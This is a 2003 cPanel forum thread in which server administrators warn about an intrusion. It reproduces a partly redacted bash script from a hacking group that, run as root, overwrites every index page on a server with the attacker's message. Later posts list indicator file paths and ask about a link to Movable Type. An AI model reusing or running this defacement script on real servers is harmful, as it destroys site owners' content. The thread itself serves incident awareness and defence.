The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Warning - Watch For This Site.

Discussion in 'General Discussion' started by dgbaker, Jul 11, 2003.

  1. dgbaker

    dgbaker Well-Known Member
    PartnerNOC

    Joined:
    Sep 20, 2002
    Messages:
    2,578
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Toronto, Ontario Canada
    cPanel Access Level:
    DataCenter Provider
  2. nyjimbo

    nyjimbo Well-Known Member

    Joined:
    Jan 25, 2003
    Messages:
    1,125
    Likes Received:
    0
    Trophy Points:
    36
    Location:
    New York
    Could you tell us what this link is without us having to be suckered into clicking it ???

    :confused:

    cPanel.net Support Ticket Number:
     
  3. dgbaker

    dgbaker Well-Known Member
    PartnerNOC

    Joined:
    Sep 20, 2002
    Messages:
    2,578
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Toronto, Ontario Canada
    cPanel Access Level:
    DataCenter Provider
    Sorry, you are right of course, here is that page. It is a shell script actually. This thread http://forums.cpanel.net/showthread.php?s=&threadid=12014 is the result of this script. It's the exact errors we saw on another machine.



    #!/bin/bash
    # # # # # # # # # # # # # # # # # # # # # # # # # # # # ##
    # ##
    # Brazilians Intruders 0f Systens Team 2003 ##
    # Contato: bi0s@mail.com ##
    # irc.brasnet.org /j bi0sbr ##
    # www.bi0s.kit.net ##
    # Devastador de Server por OverKill_ ##
    # ##
    ##########################################################
    procura_paginas() {
    find /$DIR_LOG -name index.html >logs
    find /$DIR_LOG -name index.htm >>logs
    find /$DIR_LOG -name index.php >>logs
    #find $DIR_LOG -name *wtmp* >>logs
    LINHA=`wc logs |cut -c-7`
    }
    console() {
    REMOVE CODE FOR SAFETY REASONS; echo "ok"
    echo -n "==> Aguarde, procurando paginas.."
    procura_paginas;
    echo "encontrados $LINHA Paginas para Ownar"
    sleep 5
    echo -n "--> Colocando seu texto nas Paginas"
    for log in `cat logs`
    do
    echo -n " -> in $log..."

    cp $log $log.bak
    echo $MY_TEXT >$log
    echo "ok"
    done
    echo "Brazilians Intruders 0f Systens Ownz You. OverKill was Here | Contato: irc.brasnet.org /j bi0sbr"
    echo "ok"
    echo "((((( Agora é soh registra! )))))"
    }
    help() {
    echo " Use: $0 <seu_texto>"
    echo "Exemplo: $0 'BI0S Ownz'"
    }

    if [ `whoami` != "root" ]; then
    echo " Execute somente como root"
    exit
    fi

    if [ "$2" = "" ]; then
    DIR_LOG="./"
    else
    DIR_LOG=$2
    fi
    echo; echo ; echo "<<<<<<<<< BI0S Devastador de Server >>>>>>>>>>"
    echo " ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^"
    echo " www.bi0s.kit.net "
    echo "e-mail: bi0s@mail.com irc.brasnet.org #bi0sbr"
    echo "- - - - - - - - - - - - - - - - - - - - - - - - - - -"
    if [ "$1" = "" ]; then
    help;
    else
    MY_TEXT="$1"
    console;
    fi

    cPanel.net Support Ticket Number:
     
    #3 dgbaker, Jul 11, 2003
    Last edited: Jul 11, 2003
  4. TheRedX

    TheRedX Member

    Joined:
    Jul 9, 2003
    Messages:
    6
    Likes Received:
    0
    Trophy Points:
    1
    How is this shell executed?
    Is this something that's being uploaded to a server and run or is it a remote script seeking exploits.
    "watch for this site" is a poor warning.

    cPanel.net Support Ticket Number:
     
  5. dgbaker

    dgbaker Well-Known Member
    PartnerNOC

    Joined:
    Sep 20, 2002
    Messages:
    2,578
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Toronto, Ontario Canada
    cPanel Access Level:
    DataCenter Provider
    It was found out by going through bash_history.

    Look for /root/mass2.sh /root/devastodor.sh
    and hidden files /root/.devastador.sh.swp and /root/.devastador.sh.swo

    cPanel.net Support Ticket Number:
     
  6. semaj

    semaj Well-Known Member

    Joined:
    Nov 27, 2002
    Messages:
    61
    Likes Received:
    0
    Trophy Points:
    6
  7. Duncan

    Duncan Member

    Joined:
    Feb 19, 2003
    Messages:
    22
    Likes Received:
    0
    Trophy Points:
    1
    while looking through the source: can one prevent it by changing the execute permission for "others" on the killall command?

    cPanel.net Support Ticket Number:
     
  8. newfield

    newfield Active Member

    Joined:
    Mar 2, 2002
    Messages:
    38
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    State of Confusion
    So, is there a connection between the attacks and Movable Type, or just co-incidence?

    cPanel.net Support Ticket Number:
     
  9. semaj

    semaj Well-Known Member

    Joined:
    Nov 27, 2002
    Messages:
    61
    Likes Received:
    0
    Trophy Points:
    6
    After further investigating, 2 of the 3 domains haad movable type, the third did not.

    cPanel.net Support Ticket Number:
     
  10. infinityws

    infinityws Well-Known Member

    Joined:
    Feb 20, 2003
    Messages:
    110
    Likes Received:
    0
    Trophy Points:
    16
    What version of MT did it have?

    cPanel.net Support Ticket Number:
     
  11. casey

    casey Well-Known Member

    Joined:
    Jan 17, 2003
    Messages:
    2,303
    Likes Received:
    0
    Trophy Points:
    36
    Location:
    If there is trouble, it will find me
    Yeah, good question. If it was MT, then it needs to be banned...

    cPanel.net Support Ticket Number:
     
Loading...

Share This Page